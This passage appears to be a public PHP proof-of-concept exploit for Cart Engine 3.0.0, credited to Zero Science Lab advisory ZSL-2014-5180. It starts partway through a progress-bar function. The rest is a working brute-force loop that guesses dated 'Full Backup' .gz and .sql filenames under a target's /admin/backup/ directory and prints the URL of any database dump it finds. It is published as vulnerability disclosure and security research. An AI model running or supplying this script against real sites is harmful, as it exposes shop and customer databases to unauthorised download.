$total) return; if(empty($start_time)) $start_time=time(); $now = time(); $perc=(double)($done/$total); $bar=floor($perc*$size); $disp=number_format($perc*100, 0); $status_bar="\r $disp% ["; $status_bar.=str_repeat("=", $bar); if($bar<$size) { $status_bar.=">"; $status_bar.=str_repeat(" ", $size-$bar); } else { $status_bar.="="; } $status_bar.="] $done/$total"; $rate = ($now-$start_time)/$done; $left = $total - $done; $eta = round($rate * $left, 2); $elapsed = $now - $start_time; $status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec."; echo "$status_bar "; flush(); if($done == $total) { echo "\n"; } } print " @---------------------------------------------------------------@ | | | Cart Engine 3.0.0 Database Backup Disclosure Exploit | | | | | | Copyleft (c) 2014, Zero Science Lab | | | | Advisory ID: ZSL-2014-5180 | | www.zeroscience.mk | | | @---------------------------------------------------------------@ "; if ($argc < 4) { print "\n\n [+] Usage: php $argv[0] \n\n"; print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n"; die(); } $godina_array = array('2014','2013','2012','2011','2010'); $mesec_array = array('12','11','10','09', '08','07','06','05', '04','03','02','01'); $dn_array = array('31','30','29','28','27','26', '25','24','23','22','21','20', '19','18','17','16','15','14', '13','12','11','10','09','08', '07','06','05','04','03','02', '01'); $host = $argv[1]; $port = intval($argv[2]); $path = $argv[3]; $dbnm = "Full%20Backup%20"; $alert1 = "\033[1;31m"; $alert2 = "\033[0;37m"; $alert3 = "\033[1;32m"; echo "\n [*] Running checks:\n\n"; foreach($godina_array as $godina) { foreach($mesec_array as $mesec) { $x++; status($x, 58); foreach($dn_array as $dn) { $ext=".gz"; if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext)) { echo "\n"; echo $alert1; print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n"; echo $alert2; print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n"; print " Full URL:\x20"; echo $alert3; die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n"); } $ext=".sql"; if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext)) { echo "\n"; echo $alert1; print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n"; echo $alert2; print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n"; print " Full URL:\x20"; echo $alert3; die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n"); } } } } print "\n\n [*] Zero findings!\n\n\n"; ?>